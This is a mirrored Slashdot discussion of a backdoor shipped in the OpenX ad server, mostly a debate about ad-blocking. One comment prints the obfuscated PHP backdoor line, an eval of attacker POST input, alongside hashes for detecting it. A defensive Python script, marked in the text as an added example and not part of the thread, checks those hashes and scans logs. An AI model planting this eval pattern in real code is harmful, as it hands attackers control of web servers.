Slashdot Mirror


Backdoor Found In OpenX Ad Platform

mask.of.sanity writes "A backdoor has existed for at least seven months in a platform sold by OpenX, the self-described global leader of digital advertising which counts the New York Post, Coca Cola, Bloomberg and EA among its customers. The backdoor was contained within the official OpenX package and recently removed. Security researchers say it meant those who downloaded the compromised software could have provided attackers full access to their web sites."

26 of 43 comments

  1. Would you steal a Car? by Chompjil · · Score: 1

    So pretty much Malware ads only with full websites
    Also EasyList Blocks the Sucuri site

    --
    People once told me 68K ram was all we needed,
    1. Re:Would you steal a Car? by xQuarkDS9x · · Score: 2

      So pretty much Malware ads only with full websites
      Also EasyList Blocks the Sucuri site

      And this is why I tell friends and family to run Adblock plus and keep it updated so you have a lot lower chance (if any) to see ads from websites you *believe* are safe delivering malicious code via ads.

      --
      You must master your joystick like a fisherman masters bait! - Gimpy
    2. Re: Would you steal a Car? by 0123456 · · Score: 4, Insightful

      Ha-ha-ha.

      At work we have a PC which runs with no ad-blocking. Opening a web site often involves staring at a blank window for thirty seconds or more with a status bar saying something like 'Waiting for ads.bollockx.com'.

      If the web wasn't such an ad-infested Swamp Of Suck, people wouldn't be blocking them.

    3. Re: Would you steal a Car? by Russ1642 · · Score: 2

      Demonstrating the Heisenberg joke principle. Explaining or measuring the funniness of a joke instantaneously makes it no longer funny. (Also applies to sarcasm)

    4. Re:Would you steal a Car? by KiloByte · · Score: 2

      EasyList has a serious flaw: it doesn't add EasyPrivacy by default. Spying servers are nearly as likely to contain extra risks as ad ones.

      --
      The creatures outside looked from Alt-Right to Antifa; but already it was impossible to say which was which.
    5. Re: Would you steal a Car? by UnknownSoldier · · Score: 1

      Quit trolling.

      *I* pay for the bandwidth. Ads are stealing from *me* both in time and money.

    6. Re: Would you steal a Car? by Anonymous Coward · · Score: 1

      Then what are we stealing?

      Theft, by definition, means you take the original and the prior owner *no longer* has said item.

      Last I checked, not viewing ads on tv or the web doesn't mean I was stealing anything from said companies trying to sell me something.

    7. Re:Would you steal a Car? by aztracker1 · · Score: 1

      I use adblock plus and ghostery... though I specifically unblock google ads, and disqus... the rest is pretty much blocked... it's annoying when certain sites won't work with them enabled (I just move on).

      --
      Michael J. Ryan - tracker1.info
    8. Re: Would you steal a Car? by RabidReindeer · · Score: 1

      You must be the kind of person who steals candy from babies too.

      Honestly, there is no legitimate reason to run Adblock if you live in an English speaking part of the world. You block, you're a thief. This is not like video interstitials on TV/youtube that waste your time by not being skippable.

      The bandwidth argument can only be applied to 2.5G EDGE networks.

      The real problem with OPENX is that it's the example that proves the rule that open source doesn't automatically make something better.

      I appreciate a good ad. However, I'm no more interested in being assaulted by annoying ads than I am in being accosted by muggers. I don't routinely block, but if they affront me with auto-playing noisy dreck, you can bet I'm going to block them.

      And tell your brat to stop crying.

    9. Re: Would you steal a Car? by Smauler · · Score: 1

      Honestly, there is no legitimate reason to run Adblock if you live in an English speaking part of the world. You block, you're a thief.

      I don't think I have once clicked on an ad (deliberately) online, in all of my 20 years or so of using the internet. I don't use advertisements as a decent source of information.

      I've only recently started using adblock, because I see myself as a thief if I steal all the advertisers' bandwidth without ever clicking or buying. They're paying for this exposure.

      I generally try to buy from companies that advertise less... when you buy from companies that advertise a lot, you fund the advertisements.

      It's good you've equated not looking at adverts to theft.... it makes your argument all the more persuasive.

    10. Re: Would you steal a Car? by Stan92057 · · Score: 1

      I already pay for content through higher prices to feed advertising budgets. So do I feel bad? Not a fucking chance. Get rid of ALL flashing, blinking and sound ads and I will get rid of my ad blocker. There is no guarantee an ad network is clean and not serving malware/adware/viruses/spyware, so screw you, my computer safety comes first. And I don't need to have what I do on the net spied upon; just fucking ask me what I would like. Ya, I know, it's too hard and costs more money, boo fucken hooo.

      --
      Jack of all trades, master of none
    11. Re: Would you steal a Car? by mattack2 · · Score: 1

      You're paying for the *bandwidth*. You're not paying for the *content* of the web pages you are going to. They have to pay for their employees, etc. somehow. (I say this as someone who hates ads probably as much as you do.)

  2. interestingly, has always been open source by Trepidity · · Score: 4, Interesting

    OpenX makes an interesting example of a technically open-source project that fails to benefit from open-source much at all. It's GPL'd, but they don't support any kind of public development (no public revision-control systems or anything), and they even make you register to download the source. The page where you do so mostly just tries to convince you not to do so. A third-party site mirrors the open-source version for no-login downloads, but it seems just out of personal interest, since he's the developer of a predecessor to OpenX. It's not clear there is anybody who cares about this codebase or ever looks at it outside the company. Hence, technically open-source, but trying as hard as possible not to be.

    1. Re:interestingly, has always been open source by Karzz1 · · Score: 3, Interesting

      While there are certain hurdles, there certainly is an officially supported revision-control system: https://svn.openx.org/

      Having said that, I don't see much there that is newer than the official "community" release.

      --
      Beware of he who would deny you access to information, for in his heart he dreams himself your master.
    2. Re:interestingly, has always been open source by Banacek · · Score: 1
    3. Re:interestingly, has always been open source by pHalec · · Score: 3, Informative

      OpenX has been through many twists and turns. I started using it with my employer when it was called phpAdsNew; it then became OpenAds; then OpenX.

      It gradually went from a passably supported and FOSS-minded project to a hybrid model, with the FOSS part atrophying very quickly. It became clear to us that this was a liability and we stopped using it. We're now actively avoiding hybrid models like this.

      Finding a 7-month-old backdoor vindicates our suspicions.

    4. Re:interestingly, has always been open source by wimg · · Score: 5, Interesting

      I'm the third party you're talking about, the developer of phpAdsNew. Sadly, things took a turn for the worse when the company OpenAds (now OpenX) decided to make a business out of the advertising server. Although they've made a lot of money, the open source version has been neglected completely.

      I put the download page online because I didn't like the fact that you had to register, but I haven't been involved in the project since 2002, so there's not much I can do about this shameful bug.

    5. Re:interestingly, has always been open source by sr180 · · Score: 1

      Yes - it's been exploited too. I admin a site - and we were hit quite hard by this. I'm amazed that it's taken this long for the exploit to be acknowledged.

      --
      In Soviet Russia the insensitive clod is YOU!
  3. Everything has "Hidden Backdoors" in it... by dryriver · · Score: 2, Interesting

    ... it's just a question of how long it takes - how many months or years - for the backdoor's existence to become public knowledge. ---- Once the backdoor is revealed to be there, of course, the whole thing is spun as an "unintentional software/system vulnerability". ---- Nobody ever admits that the backdoor was put where it is very much on purpose, and WITH/FOR a purpose... =) My 2 Cents...

    --
    Why did the chicken cross the road? Because Elon Musk put an AI chip in its head.
  4. Another reason to hate web2.0'horrea by al0ha · · Score: 3, Insightful

    Cross domain advertising JavaScript is sooooo lame, it's required the removal of basic security implemented way back in browsers and opened the door to all kinds of miscreant behavior. I despise the Internet as a vehicle of advertising commerce.

    The Internet was conceived to share ideas and information, everything else is utter BS in the name of money grubbing.

    --
    Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
    1. Re:Another reason to hate web2.0'horrea by aztracker1 · · Score: 1

      I happen to prefer web-based applications to desktop apps (for most use cases)... this is essential to JS etc... Public facing web-apps are generally very useful as well... the problem is those that subvert the use... When I saw the first popover X-10 camera advertisement, I knew it was down hill from there.

      --
      Michael J. Ryan - tracker1.info
  5. Re:what the hell is openX? by DougOtto · · Score: 1

    Yes, Openx is a banner ad management and delivery system.

    --
    Solving Unix problems since 1989...
  6. Probably just an accident (snicker) by hyades1 · · Score: 1

    "Security researchers say it meant those who downloaded the compromised software could have provided attackers full access to their web sites."

    "Security researchers say it meant those who downloaded the compromised software undoubtedly provided attackers full access to their web sites."

    There...fixed that for you.

    --
    I've calculated my velocity with such exquisite precision that I have no idea where I am.
  7. Re:Proof Ads are evil by Noughmad · · Score: 1

    I'll take ads I can block over Geocities websites with five fonts, eight colors and blink tags.

    --
    PlusFive Slashdot reader for Android. Can post comments.
  8. Fixed in openx 2.8.11 by millisa · · Score: 1

    It is fixed in 2.8.11
    http://forum.openx.org/index.php?showtopic=503521628 has openx's response.

    Quick check on your servers by going to the openx base directory and doing an md5:
    md5sum \
        plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js \
        plugins/deliveryLog/vastServeVideoPlayer/player.delivery.php \
        lib/max/Delivery/common.php

    These md5's match the problem files:
    558c80e601fb996e5f6bbc99a9ee0051 plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js
    fa4991d5fd3bf4a947b6ab0b15ce10b2 plugins/deliveryLog/vastServeVideoPlayer/player.delivery.php
    5014c31b479094c0b32221ae1f1473ac lib/max/Delivery/common.php

    flowplayer-3.1.1.min.js is the important one.
    It has
    $j='explode';
    $_=$j(',','strrev,str_rot13,vastPlayer');
    eval($_[1]($_[0]($_POST[$_[2]])));

    obfuscated in it.

    The flowplayer-3.1.1.min.js file shouldn't have changed since 2.8.9. So if you have an older version, you can just drop that into place over top of the one you currently have (just make sure it doesn't have the php tag in it). My unexploited copy from the last version was dated 7-17-2012 and has the following md5
    8570c9bbdd01bef2c812270e68a306b5 flowplayer-3.1.1.min.js

    The update is here or if you log in to your openx administrator panel, it should show by switching to the 'Administrator' in the upper right dropdown, going to 'configuration' and to the 'product updates' section in the left hand bar.

    Finding out if someone actually used it on your server would require grepping through your logs for a post to fc.php and flowplayer-3.1.1.min.js. (I didn't see any requests for it on my servers, so I'm guessing there's not an automated scanner for it yet).

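The hash check and the log grep from the comment above, written out as a runnable defender-side script. This is an added example, not code from the thread, from millisa, or from OpenX: it compares the three files against the known-bad MD5s quoted in the comment, reports a flowplayer-3.1.1.min.js that carries a PHP open tag (which a plain JavaScript file never should), and scans web-server access-log lines in Apache combined format for POST requests to fc.php or flowplayer-3.1.1.min.js. Paths are assumed to be relative to the OpenX base directory; the IP addresses and log lines below are constructed for illustration.

```python
"""Defender-side checks for the backdoored OpenX 2.8.x delivery files.

Added example; not part of the original thread or of OpenX.  Run it from
(or point it at) the OpenX base directory.
"""
import hashlib
import os
import re

# Known-bad MD5s quoted in the comment, keyed by path relative to the OpenX base dir.
BAD_MD5 = {
    "plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js":
        "558c80e601fb996e5f6bbc99a9ee0051",
    "plugins/deliveryLog/vastServeVideoPlayer/player.delivery.php":
        "fa4991d5fd3bf4a947b6ab0b15ce10b2",
    "lib/max/Delivery/common.php":
        "5014c31b479094c0b32221ae1f1473ac",
}
FLOWPLAYER = "plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js"
# MD5 of the unmodified flowplayer file as quoted in the comment (dated 7-17-2012).
CLEAN_FLOWPLAYER_MD5 = "8570c9bbdd01bef2c812270e68a306b5"

# Any PHP open tag.  A bare "<?" inside legitimate minified JS is unlikely but
# possible, so "php-in-js" is a prompt for manual review, not a verdict.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)?", re.IGNORECASE)


def md5_of(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def classify_file(relpath: str, data: bytes) -> str:
    """Return 'known-bad', 'clean', 'php-in-js' or 'unknown' for one file's bytes."""
    digest = md5_of(data)
    if BAD_MD5.get(relpath) == digest:
        return "known-bad"
    if relpath == FLOWPLAYER:
        if digest == CLEAN_FLOWPLAYER_MD5:
            return "clean"
        if PHP_TAG.search(data):
            return "php-in-js"
    return "unknown"


def scan(base_dir: str) -> dict:
    """Classify each of the three files under base_dir ('missing' if absent)."""
    results = {}
    for relpath in BAD_MD5:
        full = os.path.join(base_dir, relpath)
        if not os.path.isfile(full):
            results[relpath] = "missing"
            continue
        with open(full, "rb") as fh:
            results[relpath] = classify_file(relpath, fh.read())
    return results


# Apache combined log format: client, ident, user, [timestamp], "METHOD path proto" ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*"'
)
# The two scripts the comment says to look for.  Matched on basename because the
# URL prefix depends on where the install is mounted.
TARGETS = {"fc.php", "flowplayer-3.1.1.min.js"}


def suspicious_requests(lines) -> list:
    """Return POST requests to the target files; GETs are normal ad-delivery traffic."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if m.group("method") == "POST" and os.path.basename(path) in TARGETS:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"), "path": path})
    return hits


# Constructed sample log lines (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Aug/2013:10:01:02 +0000] "GET /www/delivery/fc.php?zoneid=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Aug/2013:10:02:15 +0000] "POST /www/delivery/fc.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Aug/2013:10:03:40 +0000] "GET /openx/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js HTTP/1.1" 200 40000 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Aug/2013:10:04:01 +0000] "POST /openx/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js HTTP/1.1" 200 64 "-" "python-requests/1.2"',
    '203.0.113.11 - - [05/Aug/2013:10:05:22 +0000] "POST /www/admin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for path, verdict in scan(".").items():
        print(f"{verdict:10} {path}")
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious POST:", hit)
```

Feed real access logs to `suspicious_requests` (for example `suspicious_requests(open("/var/log/apache2/access.log"))`); a hit is a lead to investigate, and a clean hash result on the three files says nothing about other files the same POST access could have written.
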
  9. Ad blocking by pe1chl · · Score: 2

    I had already blocked all ads served by openx servers (by URL regexp) long before this, after a couple of bad happenings on ad sites running openx.
    It apparently is an unreliable platform. This finding only proves that.
    However, I also think the ad platforms should make 5 steps back to become credible and acceptable again.
    An ad server should be called from some customer-specific URL on the website and then serve a JPG or PNG with the ad. Period.
    All the hoopla with javascripts fetched from different places, iframes, active content (like flash) etc has made it into an unreliable piece of junk that just asks for being blocked. When I block it, they should not blame me but blame themselves.